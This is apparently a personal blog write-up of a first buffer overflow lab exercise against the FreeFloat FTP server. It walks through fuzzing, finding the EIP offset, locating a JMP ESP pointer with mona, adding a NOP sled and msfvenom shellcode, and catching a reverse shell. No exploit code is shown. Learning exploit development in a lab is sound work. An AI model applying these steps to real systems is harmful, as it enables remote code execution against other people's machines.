Finally after some hard work I managed to understand and create my first buffer overflow it has been amazing and really worth the learning of course some people might say that this is really to old school as there are different and more techniques to create and detect buffer overflows but sometimes the basic is the best and all you need as it is still applied in modern softwares and if you ever need to learn anything new its always best to have a solid understanding in the basics so you know where to go after that
Lets Start
I managed to follow tutorials from different blogs (I will put the links at the end) where they amazingly explain buffer overflow and give you an insight of what they are and how they work
A simple Wikipedia search says this:
In information security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory locations.
We will download the free-float ftp server into our debugging machine and attach it to Immunity Debugger
(RDP Session)
We will create a simple fuzzer from our attacking machine (I used python) and send a huge amount of characters so we can understand where the EIP gets over written once we send ouf fuzzer we can see the results running on our immunity debugger
(I used the pattern script from msfconsole to find the exact location on where the EIP gets written then the offset script from msfconsole to locate the exact location)
Once located we can make sure by editing our fuzzer and add 42 (“B” in hex code) and see if we got the correct location
We run it and check our debugger
Perfect the EIP gets over written with 42’s
Once that has been handled we will need to replace the “B” with a pointer that redirects the flow into ESP as it contains a suitable amount of characters to contain our shellcode (Our shellcode cannot contain bad characters)
We will go into the Logs Option in the View menu on the debugger and use mona.py script to help us locate a suitable pointer with this command
!mona jmp -r esp
We are almost done. We need to do modify our POC a bit to add a variable for our shellcode and insert a payload that is to our liking. Lets start with the POC, we will be inserting our payload in the part of the buffer that is now made up of C’s. Ideally we would like to have the buffer length modified dynamically so we don’t need to recalculate if we insert a payload with a different size (our total buffer length should remain 1000-bytes). We should also insert some NOP’s (No Operation Performed = \x90) before our payload as padding. You can see the result below. Any shellcode that we insert in the shellcode variable will get executed by our buffer overflow.
We will use msfvenom to create our shell and eliminate the bad characters that stops us from executing our shell
Our final result
We restart our program and run a handler to get the connection back to us and I will use msfconsole just for the simplicity of it and we can see that we got a shell back to our attacking machine
References:
https://www.fuzzysecurity.com/tutorials/expDev/2.html
https://en.wikipedia.org/wiki/Buffer_overflow
DMCXBLUE 